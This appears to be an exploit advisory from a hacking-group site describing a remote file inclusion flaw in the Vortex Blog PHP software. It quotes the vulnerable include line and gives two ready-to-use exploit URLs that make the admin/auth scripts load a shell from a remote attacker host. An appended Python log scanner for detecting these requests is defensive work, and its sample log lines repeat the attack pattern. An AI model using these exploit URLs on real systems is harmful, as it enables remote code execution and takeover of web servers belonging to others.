WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
Portal Name : Vortex Blog AKA vBlog
Class = Remote File Inclusion
Download = http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
Found by = Dr.Pantagon ([email protected])
Vulnerable Code:
include($cfgProgDir . "session.php");
++++++++++++++++++++++++++++++++++++++++++++
Exploit:
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To My Best Friend : Tanha
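
Detection sketch for the request shape shown under Exploit, added here as an example and not part of the original advisory: it scans web access logs for requests that supply cfgProgDir and separates values that would make include() read from a remote stream from other tampering. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "cfgProgDir"  # include-path variable named in the advisory
SCRIPTS = ("/admin/auth/secure.php", "/admin/auth/checklogin.php")
# A scheme (http:, ftp:, php:, data: ...) or a //host or \\host prefix means
# include() would read from a stream rather than a local directory.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)
# Assumed input: Apache/nginx combined log format.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return a finding dict for a request that supplies cfgProgDir, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    script = unquote(url.path)
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key != PARAM:
            continue
        value = unquote(value)  # parse_qsl decoded once; also catch double encoding
        return {
            "client": client,
            "script": script,
            "known_script": script.endswith(SCRIPTS),
            "kind": "remote-include" if REMOTE.match(value) else "param-tamper",
            "value": value,
        }
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses and reserved host names).
SAMPLE = [
    '192.0.2.10 - - [10/Oct/2006:13:55:36 +0000] "GET /blog/admin/auth/secure.php?cfgProgDir=http://remote.example/x? HTTP/1.0" 200 512 "-" "-"',
    '192.0.2.11 - - [10/Oct/2006:13:56:02 +0000] "GET /blog/admin/auth/checklogin.php?cfgProgDir=%68ttp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 498 "-" "-"',
    '192.0.2.12 - - [10/Oct/2006:13:57:40 +0000] "GET /blog/admin/auth/secure.php?cfgProgDir=../inc/ HTTP/1.1" 200 130 "-" "-"',
    '192.0.2.13 - - [10/Oct/2006:13:58:15 +0000] "GET /blog/index.php?page=2 HTTP/1.1" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Access logs record only the query string, so if the application also accepts cfgProgDir from a POST body or cookie, that traffic needs application or WAF logging to be visible.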